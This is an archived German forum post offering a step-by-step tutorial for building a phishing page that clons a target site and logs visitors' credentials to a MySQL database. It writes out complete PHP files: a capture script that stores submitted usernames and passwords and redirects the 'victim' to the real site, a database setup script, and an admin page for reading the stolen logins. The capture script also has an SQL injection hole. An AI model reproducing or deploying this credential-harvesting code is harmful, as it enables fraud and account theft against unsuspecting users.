Vollständige Version anzeigen : Phishing-Page(sql-database)


plz.die.thx.bye
01.08.2007, 14:23

Phishing Page - SQL-Database-Tutorial



---------------------------------

Als erstes krallt ihr euch den source code der zu kopierenden webseite, welcher an euren browser geschikt wurde...
Im klartext, ihr geht offnet die page die ihr kopieren wollt, in eurem browser und lasst euch deren queletext anzeigen
(im IE... Rechtsklick->Queletext anzeigen), dieser queletext, ist nartürlich bei einer php seite, nur das html,
das von dem php-script auf dem server generiert wurde. Das macht aber nichts, Da ihr nach umwandlung der relativen links zu den grafiken.;etc..
Ein abbild der originalen page habt.

---------------------------------

Nun meldet ihr euch bei einem free-webspace anbieter an, bei den ihr auch noch zugriff auf eine SQL Datenbank habt.

Erstellt nun folgende dateien alle in einem gemeinsamen verzeichniss..;(Was in den dateien nacher steht, wird weiter unten erklärt^^)

---------------------------------
index;html
send;php
sqlconnect;php
make;php
admin;php
---------------------------------

Öffnet die "index;html" in einem stink normalen text-editor..;und kopiert den abgeänderten html-source-code (den wir wieter oben besprochen haben: "Naja, dann fang ich ma eben an..;")
in die geöffnete "index;html" und speichert diese ab.

Öffnet die "send;php" tippt oder kopiert folgenden code hinein:(nartürlich ohne die abgrenzungen(#####..;)).

#################################

<?
include ("sqlconnect;php");
$username = $_POST["username"];
$userpasswort = $_POST["passwort"];
$eintrag = "INSERT INTO base (user, pwd) VALUES ('$username', '$userpasswort')";
$eintragen = mysql_query($eintrag);
?>
<meta http-equiv="refresh" content="0; URL=;;;de">

#################################

anstatt: ";;;de" gebt ihr nartürlich die adresse zur Seite an, an die das "Opfer", (nachdem es die daten abgesendet hat) weitergeleitet werden soll.

Öffnet die "sqlconnect;php" tippt oder kopiert folgenden code hinein:(nartürlich ohne die abgrenzungen(#####..;)).

#################################

<?
$server = "localhost";
$user = "root";
$pwd = "1337";
$database = "data";
mysql_connect("$server","$user","$pwd") or die ("Keine Verbindung moeglich");
mysql_select_db("$database") or die ("Die Datenbank existiert nicht");
?>

#################################

anstatt "localhost" gebt ihr den servernamen an, der euch bei eurem free-webspace anbieter zur verfügung steht;(Sucht mal nach "(MY)SQL und den verbindungsdaten.
anstatt "root" gebt ihr euren sql-benutzernamen an;(findet ihr ebenfalls bei eurem free-webspace anbieter;(ihr müsst euch dazu nartürlich mit nach der registration einloggen)
anstatt "1337" gebt ihr das dazugehörige passwort ein;(findet ihr ebenfalls bei eurem free-webspace anbieter)
anstatt "data" gebt ihr den datenbanknamen ein;(findet ihr ebenfalls bei eurem free-webspace anbieter)

Öffnet die "make;php" tippt oder kopiert folgenden code hinein:(nartürlich ohne die abgrenzungen(#####..;)).

#################################

<?
include ("sqlconnect;php");
$sql = 'CREATE TABLE `base` ('
. ' `user` VARCHAR(255) NOT NULL, '
. ' `pwd` VARCHAR(255) NOT NULL'
. ' )'
. ' ENGINE = myisam;';
$eintragen = mysql_query($sql);
echo "Tabelle erstellt... Kannst diese datei jetzt löschen";
?>

#################################


Öffnet die "admin;php" tippt oder kopiert folgenden code hinein:(nartürlich ohne die abgrenzungen(#####..;)).

#################################

<?
include ("sqlconnect;php");
$ident = $_POST["pw"];
if (isset($ident))
{
if ($ident=="deinpw")
{

$abfrage = "SELECT * FROM base";
$ergebnis = mysql_query($abfrage);
while($row = mysql_fetch_object($ergebnis))
{
echo "ID: $row->user";
echo "&nbsp;&nbsp;&nbsp;";
echo "PW: $row->pwd";
echo "<br>";
}
}
else
{
echo "Sorry dat war wohl nix!";
}
}
else
{
echo "<form action=\"admin;php\" method=\"post\">";
echo "<input type=\"text\" name=\"pw\" size=\"21\" value=\"pw eingeben\" maxlength=\"50\">";
echo "</form>";
}
?>

#################################

anstatt "deinpw" gebt ihr ein belibiges Passwort ein.

So.;zum abschluss ladet ihr diese 5 Dateien auf euren webspace hoch, und führt die "make;php" im browser aus ... also ruhft z;B. folgende seite auf: ";deinname;deinanbieter~de/make;php".
Jetzt löscht die "make;php" aus dem verzeichniss, und ihr könnt nun eure webseite direkt über "index;html" aufrufen, und ihr könnt die eingetragenen daten der "Opfer"
über die "admin;php" aufrufen... z;B;: ";deinname;deinanbieter~de/admin;php".

-----------------------------------------------

Das wars eig. auch schon zur eigenen phishing-page mit SQL-Database...


Bw wäre net ;)

Mfg Andy

Hardware Preisvergleich | Amazon Blitzangebote!

Videos zum Thema
Video Loading...
Ähnliche Themen zu Phishing-Page(sql-database)
  • [SQL] Vbulletin 4.0.2 pl4 Database Error!
    Habe heute folgendes Problem mit meinem Vbulletin festgestellt -;-: Database error in vBulletin : mysql_connect() [<a href='function;mysql-connect'>function;mysql-connect</a>]: Too many connections /vhosts/;~xx/httpdocs/includes/class_core;php on line 312 MySQL Error : Error Number : Re [...]

  • [new neue page]eher eine dj page commens & bewerten plzz
    hi wollte euch mal mein neues design zeigen was ich für meinen bruder gemacht habe. OT-Style page (;testestetst;pytalhost~com/page%202000g%E4ste/index;html) und das untere design by stimmt nicht das untere ist die alte page von meinem bro. comments erwünscht und das mixxen hat er gemacht [...]

  • Mit der Database bei bythost.com
    Hi, ich hatte das vBulletin board auf bythost~com - de beste bron van informatie over Free hosting. (;;;bythost~com) hochgeladen und am anfang hat auch alles wunderbar geklappt, dann bekomm ich aber diese Fehlermeldung: There seems to have been a problem with the database. Please try again by cl [...]

  • [Mac] Database Editor
    hallo, ich nutze aufm pc mysqlyog enterprise und suche was adequates für mein Mac... jedoch habe ich keinen datenbank editor gefunden der die funktion hat einzelne oder mehrere rows als sql (dump) zu exportieren. zb als "insert into" "update" "replace into" query. ich brauch diese funktion dr [...]



raid-rush.ws | Imprint & Contact pr